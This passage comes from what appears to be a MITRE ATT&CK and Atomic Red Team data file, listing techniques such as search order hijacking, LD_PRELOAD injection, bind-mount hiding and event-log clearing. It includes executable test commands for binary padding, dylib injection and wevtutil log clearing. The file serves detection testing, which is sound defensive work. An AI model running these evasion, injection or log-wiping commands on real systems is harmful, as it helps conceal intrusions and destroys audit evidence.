Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Bartosz Jerzman - Travis Smith, Tripwire - David Lu, Tripwire - Gerardo Santos x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.0' identifier: T1112 atomic_tests: [] T1574.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 created: '2020-03-13T17:48:58.999Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/008 external_id: T1574.008 - source_name: Microsoft Environment Property description: Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016. url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - source_name: Microsoft CreateProcess description: Microsoft. (n.d.). CreateProcess function. Retrieved September 12, 2024. url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa - source_name: Microsoft WinExec description: Microsoft. (n.d.). WinExec function. Retrieved September 12, 2024. 
url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec - source_name: Windows NT Command Shell description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014. url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.665Z' name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking' description: |- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program.(Citation: Microsoft CreateProcess)(Citation: Windows NT Command Shell)(Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. For example, `example.exe` runs `cmd.exe` with the command-line argument `net user`. 
If an adversary places a program called `net.exe` within the same directory as `example.exe`, `net.exe` will be run instead of the Windows system utility `net`. In addition, if an adversary places a program called `net.com` in the same directory as `net.exe`, then `cmd.exe /C net user` will execute `net.com` instead of `net.exe` due to the order of executable extensions defined under `PATHEXT`.(Citation: Microsoft Environment Property) Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001). kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Stefan Kanthak x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1574.008 atomic_tests: [] T1535: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--59bd0dec-f8b2-4b9a-9141-37a1e6899761 created: '2019-09-04T14:35:04.617Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1535 external_id: T1535 - source_name: CloudSploit - Unused AWS Regions description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019. url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:49.853Z' name: Unused/Unsupported Cloud Regions description: |- Adversaries may create cloud instances in unused geographic service regions in order to evade detection. 
Access is usually obtained through compromising accounts used to manage cloud infrastructure. Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected. A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Netskope x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.1' atomic_tests: [] T1564.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5bd41255-a224-4425-a2e2-e9d293eafe1c created: '2025-01-30T21:01:16.340Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1564/013 external_id: T1564.013 - source_name: Ahn Lab CoinMiner 2023 description: Ahn Lab. (2023, April 24). CoinMiner (KONO DIO DA) Distributed to Linux SSH Servers. Retrieved April 4, 2025. 
url: https://asec.ahnlab.com/en/51908/ - source_name: Cado Security Commando Cat 2024 description: 'Nate Bill & Matt Muir. (2024, February 1). The Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker. Retrieved April 4, 2025.' url: https://www.cadosecurity.com/blog/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:34.469Z' name: Bind Mounts description: "Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. \n\nAdversaries may use bind mounts to map either an empty directory or a benign `/proc` directory to a malicious process’s `/proc` directory. Using the commands `mount -o bind /proc/benign-process /proc/malicious-process` (or `mount -B`), the malicious process's `/proc` directory is overlaid with the contents of a benign process's `/proc` directory. When system utilities query process activity, such as `ps` and `top`, the kernel follows the bind mount and presents the benign directory’s contents instead of the malicious process's actual `/proc` directory. 
As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.(Citation: Cado Security Commando Cat 2024)(Citation: Ahn Lab CoinMiner 2023)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Lê Phương Nam, Group-IB x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux x_mitre_version: '1.0' atomic_tests: [] T1027.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5 created: '2020-02-05T14:04:25.865Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1027/001 external_id: T1027.001 - source_name: ESET OceanLotus description: Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018. url: https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/ - source_name: Securelist Malware Tricks April 2017 description: Ishimaru, S. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019. url: https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/ - source_name: VirusTotal FAQ description: VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019. url: https://www.virustotal.com/en/faq/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:50.205Z' name: 'Obfuscated Files or Information: Binary Padding' description: "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 
This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limit the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Martin Jirkal, ESET x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - Windows - macOS x_mitre_version: '1.3' identifier: T1027.001 atomic_tests: - name: Pad Binary to Change Hash - Linux/macOS dd auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a description: | Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. 
supported_platforms: - linux - macos input_arguments: file_to_pad: description: Path of binary to be padded type: path default: "/tmp/evil-binary" dependency_executor_name: sh dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; ' get_prereq_command: 'cp /bin/ls #{file_to_pad} ' executor: command: | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data cleanup_command: 'rm #{file_to_pad} ' name: sh - name: Pad Binary to Change Hash using truncate command - Linux/macOS auto_generated_guid: e22a9e89-69c7-410f-a473-e6c212cd2292 description: | Uses truncate to add a byte to the binary to change the hash. Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change. supported_platforms: - linux - macos input_arguments: file_to_pad: description: Path of binary to be padded type: path default: "/tmp/evil-binary" dependency_executor_name: sh dependencies: - description: 'The binary must exist on disk at specified location (#{file_to_pad}) ' prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; ' get_prereq_command: 'cp /bin/ls #{file_to_pad} ' executor: command: 'truncate -s +1 #{file_to_pad} #adds a byte to the file size ' cleanup_command: 'rm #{file_to_pad} ' name: sh T1484.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163 created: '2020-12-28T21:50:59.844Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1484/001 external_id: T1484.001 - source_name: Mandiant M Trends 2016 description: Mandiant. (2016, February 25). 
Mandiant M-Trends 2016. Retrieved November 17, 2024. url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - source_name: ADSecurity GPO Persistence 2016 description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.' url: https://adsecurity.org/?p=2716 - source_name: Microsoft Hacking Team Breach description: 'Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.' url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/ - source_name: Wald0 Guide to GPOs description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019. url: https://wald0.com/?p=179 - source_name: Harmj0y Abusing GPO Permissions description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024. url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/ - source_name: Harmj0y SeEnableDelegationPrivilege Right description: Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved September 23, 2024. url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/ - source_name: TechNet Group Policy Basics description: 'srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.' 
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:50.475Z' name: 'Domain Policy Modification: Group Policy Modification' description: "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. 
write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), \ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Itamar Mizrahi, Cymptom - Tristan Bennett, Seamless Intelligence x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - 
enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.1' identifier: T1484.001 atomic_tests: [] T1078.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d created: '2020-03-13T20:15:31.974Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1078/001 external_id: T1078.001 - source_name: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023 description: Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025. url: https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/ - source_name: AWS Root User description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html - source_name: Microsoft Local Accounts Feb 2019 description: Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts - source_name: Metasploit SSH Module description: undefined. (n.d.). Retrieved April 12, 2019. url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - source_name: Threat Matrix for Kubernetes description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021. url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - source_name: Pentera vCenter Information Disclosure description: Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information Disclosure. Retrieved March 26, 2025. 
url: https://pentera.io/blog/information-disclosure-in-vmware-vcenter/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:51.181Z' name: 'Valid Accounts: Default Accounts' description: |- Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. 
If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Janantha Marasinghe x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - SaaS - IaaS - Linux - macOS - Containers - Network Devices - Office Suite - Identity Provider - ESXi x_mitre_version: '1.5' identifier: T1078.001 atomic_tests: - name: Enable Guest Account on macOS auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4 description: This test enables the guest account on macOS using sysadminctl utility. supported_platforms: - macos executor: command: sudo sysadminctl -guestAccount on cleanup_command: sudo sysadminctl -guestAccount off name: sh elevation_required: true T1574.006: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 created: '2020-03-13T20:09:59.569Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/006 external_id: T1574.006 - source_name: Apple Doco Archive Dynamic Libraries description: Apple Inc. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021. 
url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html - source_name: Baeldung LD_PRELOAD description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021. url: https://www.baeldung.com/linux/ld_preload-trick-what-is - source_name: TheEvilBit DYLD_INSERT_LIBRARIES description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX. Retrieved March 26, 2020. url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ - source_name: Intezer Symbiote 2022 description: 'Joakim Kennedy and The BlackBerry Threat Research & Intelligence Team. (2022, June 9). Symbiote Deep-Dive: Analysis of a New, Nearly-Impossible-to-Detect Linux Threat. Retrieved March 24, 2025.' url: https://intezer.com/blog/research/new-linux-threat-symbiote/ - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass description: Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021. url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 - source_name: Man LD.SO description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved June 15, 2020. url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html - source_name: Elastic Security Labs Pumakit 2024 description: Remco Sprooten and Ruben Groenewoud. (2024, December 11). Declawing PUMAKIT. Retrieved March 24, 2025. url: https://www.elastic.co/security-labs/declawing-pumakit - source_name: TLDP Shared Libraries description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved January 31, 2020. url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html - source_name: Timac DYLD_INSERT_LIBRARIES description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. Retrieved March 26, 2020. 
url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ - source_name: ESET Ebury Oct 2017 description: 'Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.' url: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:51.810Z' name: 'Hijack Execution Flow: LD_PRELOAD' description: |- Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library.(Citation: Baeldung LD_PRELOAD) Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. 
For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to [Hide Artifacts](https://attack.mitre.org/techniques/T1564) from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`.(Citation: ESET Ebury Oct 2017)(Citation: Intezer Symbiote 2022)(Citation: Elastic Security Labs Pumakit 2024) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '2.1' identifier: T1574.006 atomic_tests: - name: Dylib Injection via DYLD_INSERT_LIBRARIES auto_generated_guid: 4d66029d-7355-43fd-93a4-b63ba92ea1be description: 'injects a dylib that opens calculator via env variable ' supported_platforms: - macos input_arguments: file_to_inject: description: Path of executable to be injected. Mostly works on non-apple default apps. 
type: path default: "/Applications/Firefox.app/Contents/MacOS/firefox" source_file: description: Path of C source file type: path default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c dylib_file: description: Path of dylib file type: path default: "/tmp/T1574006MOS.dylib" dependency_executor_name: bash dependencies: - description: 'Compile the dylib from (#{source_file}). Destination is #{dylib_file} ' prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file} ' get_prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file} ' executor: command: 'DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject} ' cleanup_command: | kill `pgrep Calculator` kill `pgrep firefox` name: bash elevation_required: false T1070.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2 created: '2020-01-28T17:05:14.707Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1070/001 external_id: T1070.001 - source_name: disable_win_evt_logging description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.' url: https://ptylu.github.io/content/report/report.html?report=25 - source_name: Microsoft Clear-EventLog description: Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. url: https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog - source_name: Microsoft EventLog.Clear description: Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018. url: https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx - source_name: Microsoft wevtutil Oct 2017 description: Plett, C. et al. (2017, October 16). wevtutil. Retrieved July 2, 2018. 
url: https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:52.287Z' name: 'Indicator Removal on Host: Clear Windows Event Logs' description: |- Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. With administrator privileges, the event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging) Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`. 
kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Lucas Heiligenstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.5' identifier: T1070.001 atomic_tests: [] T1222: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196 created: '2018-10-17T00:14:20.652Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1222 external_id: T1222 - source_name: falconoverwatch_blackcat_attack description: Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022. url: https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/ - source_name: Hybrid Analysis Icacls1 June 2018 description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. url: 